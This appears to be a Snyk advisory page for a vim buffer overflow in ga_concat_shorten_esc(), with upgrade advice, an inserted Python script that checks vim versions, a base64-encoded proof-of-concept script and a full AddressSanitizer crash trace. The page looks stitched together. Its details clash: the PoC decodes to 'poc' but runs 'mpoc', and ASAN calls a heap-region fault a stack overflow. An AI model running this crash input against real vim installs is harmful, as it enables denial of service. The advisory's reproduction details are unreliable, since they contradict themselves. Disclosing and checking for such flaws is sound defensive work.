Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade vim/vim to version v8.2.4397 or higher.
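A quick way to act on that upgrade advice across a fleet is to check what `vim --version` reports. The checker below is an added example (not Snyk's or Vim's code): it parses the "VIM - Vi IMproved <major>.<minor>" header and the "Included patches:" list, and treats an 8.2 build as fixed only when patch 4397 is present, and any later series as fixed. The sample outputs are constructed for offline use.

```python
import re
import subprocess

FIXED_SERIES = (8, 2)   # the fix shipped as patch 4397 of the 8.2 series
FIXED_PATCH = 4397


def parse_vim_version(text):
    """Return ((major, minor), set of included patch numbers) from vim --version text."""
    m = re.search(r"VIM - Vi IMproved (\d+)\.(\d+)", text)
    if not m:
        raise ValueError("not the output of vim --version")
    version = (int(m.group(1)), int(m.group(2)))
    patches = set()
    pm = re.search(r"Included patches:\s*([0-9,\s-]+)", text)
    if pm:
        # The list looks like "1-4397" or "1-100, 200-300, 305"; expand every range.
        for item in pm.group(1).replace(" ", "").split(","):
            item = item.strip()
            if not item:
                continue
            if "-" in item:
                lo, hi = item.split("-", 1)
                patches.update(range(int(lo), int(hi) + 1))
            else:
                patches.add(int(item))
    return version, patches


def is_fixed(text):
    """True if the build is 8.2 with patch 4397 applied, or belongs to a later series."""
    version, patches = parse_vim_version(text)
    if version != FIXED_SERIES:
        return version > FIXED_SERIES   # 8.3+/9.x postdate the fix; 8.1 and older never got it
    return FIXED_PATCH in patches


def installed_vim_is_fixed():
    """Run the local vim binary and check it (not exercised by the samples below)."""
    out = subprocess.run(["vim", "--version"], capture_output=True, text=True, check=True)
    return is_fixed(out.stdout)


# Constructed sample outputs, not copied from any real build.
SAMPLE_VULNERABLE = "VIM - Vi IMproved 8.2 (2019 Dec 12)\nIncluded patches: 1-2434\nCompiled by example\n"
SAMPLE_FIXED = "VIM - Vi IMproved 8.2 (2019 Dec 12)\nIncluded patches: 1-4397, 4400-4500\n"
SAMPLE_NEWER = "VIM - Vi IMproved 9.0 (2022 Jun 28)\nIncluded patches: 1-1000\n"

if __name__ == "__main__":
    for name, text in [("vulnerable", SAMPLE_VULNERABLE), ("fixed", SAMPLE_FIXED), ("newer", SAMPLE_NEWER)]:
        print(name, "->", "fixed" if is_fixed(text) else "VULNERABLE")
```

Distribution packages sometimes backport a fix without adding the patch number to this list, so a negative result should be confirmed against the package changelog before it is treated as exposure.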
Affected versions of this package are vulnerable to Buffer Overflow via ga_concat_shorten_esc() when using many composing characters in an error message.
$ echo -ne "bm9ybTEwMGdy3YAKZnUgUigpCmxldCBsaW5lPWdldGxpbmUoMSkKcmV0dSBsaW5lCmVuZGYKCmNh
bGwgYXNzZXJ0X2VxdWFsKDEsUigpKQo=" | base64 -d > poc
# ASAN
$ ./src/vim.asan -u NONE -i NONE -n -X -Z -e -m -s -S mpoc -c ":qa!"
=================================================================
==1282255==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x611000001992 at pc 0x000000c512f0 bp 0x7fffffff73d0 sp 0x7fffffff73c8
READ of size 1 at 0x611000001992 thread T0
#0 0xc512ef in ga_concat_shorten_esc /home/alkyne/vim-debug/src/testing.c:106:9
#1 0xc4bdd1 in fill_assert_error /home/alkyne/vim-debug/src/testing.c:236:2
#2 0xc498a4 in assert_equal_common /home/alkyne/vim-debug/src/testing.c:265:2
#3 0xc4972a in f_assert_equal /home/alkyne/vim-debug/src/testing.c:411:28
#4 0x63311b in call_internal_func /home/alkyne/vim-debug/src/evalfunc.c:2863:5
#5 0xcc0dfc in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:14
#6 0xcbf004 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1782:8
#7 0xce002e in ex_call /home/alkyne/vim-debug/src/userfunc.c:5398:6
#8 0x6be248 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#9 0x6b1cf2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#10 0xad0efe in do_source /home/alkyne/vim-debug/src/scriptfile.c:1516:5
#11 0xace6bc in cmd_source /home/alkyne/vim-debug/src/scriptfile.c:1098:14
#12 0xace43d in ex_source /home/alkyne/vim-debug/src/scriptfile.c:1124:2
#13 0x6be248 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#14 0x6b1cf2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#15 0x6b4fb0 in do_cmdline_cmd /home/alkyne/vim-debug/src/ex_docmd.c:587:12
#16 0xe9e4c4 in exe_commands /home/alkyne/vim-debug/src/main.c:3089:2
#17 0xe9c1fe in vim_main2 /home/alkyne/vim-debug/src/main.c:772:2
#18 0xe95e3b in main /home/alkyne/vim-debug/src/main.c:424:12
#19 0x7ffff7bf80b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#20 0x41ea0d in _start (/home/alkyne/vim-debug/src/vim.asan+0x41ea0d)
0x611000001992 is located 199 bytes to the right of 203-byte region [0x611000001800,0x6110000018cb)
allocated by thread T0 here:
#0 0x49b1bd in __interceptor_malloc (/home/alkyne/vim-debug/src/vim.asan+0x49b1bd)
#1 0x4cd318 in lalloc /home/alkyne/vim-debug/src/alloc.c:248:11
#2 0x4cd269 in alloc /home/alkyne/vim-debug/src/alloc.c:151:12
#3 0xba8c71 in string_quote /home/alkyne/vim-debug/src/strings.c:782:13
#4 0x617017 in echo_string_core /home/alkyne/vim-debug/src/eval.c:5202:13
#5 0xc87bfa in tv2string /home/alkyne/vim-debug/src/typval.c:2186:12
#6 0xc4bdc6 in fill_assert_error /home/alkyne/vim-debug/src/testing.c:236:29
#7 0xc498a4 in assert_equal_common /home/alkyne/vim-debug/src/testing.c:265:2
#8 0xc4972a in f_assert_equal /home/alkyne/vim-debug/src/testing.c:411:28
#9 0x63311b in call_internal_func /home/alkyne/vim-debug/src/evalfunc.c:2863:5
#10 0xcc0dfc in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:14
#11 0xcbf004 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1782:8
#12 0xce002e in ex_call /home/alkyne/vim-debug/src/userfunc.c:5398:6
#13 0x6be248 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#14 0x6b1cf2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#15 0xad0efe in do_source /home/alkyne/vim-debug/src/scriptfile.c:1516:5
#16 0xace6bc in cmd_source /home/alkyne/vim-debug/src/scriptfile.c:1098:14
#17 0xace43d in ex_source /home/alkyne/vim-debug/src/scriptfile.c:1124:2
#18 0x6be248 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#19 0x6b1cf2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#20 0x6b4fb0 in do_cmdline_cmd /home/alkyne/vim-debug/src/ex_docmd.c:587:12
#21 0xe9e4c4 in exe_commands /home/alkyne/vim-debug/src/main.c:3089:2
#22 0xe9c1fe in vim_main2 /home/alkyne/vim-debug/src/main.c:772:2
#23 0xe95e3b in main /home/alkyne/vim-debug/src/main.c:424:12
#24 0x7ffff7bf80b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/alkyne/vim-debug/src/testing.c:106:9 in ga_concat_shorten_esc
Shadow bytes around the buggy address:
0x0c227fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff82f0: 06 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff8310: 00 00 00 00 00 00 00 00 00 03 fa fa fa fa fa fa
0x0c227fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c227fff8330: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1282255==ABORTING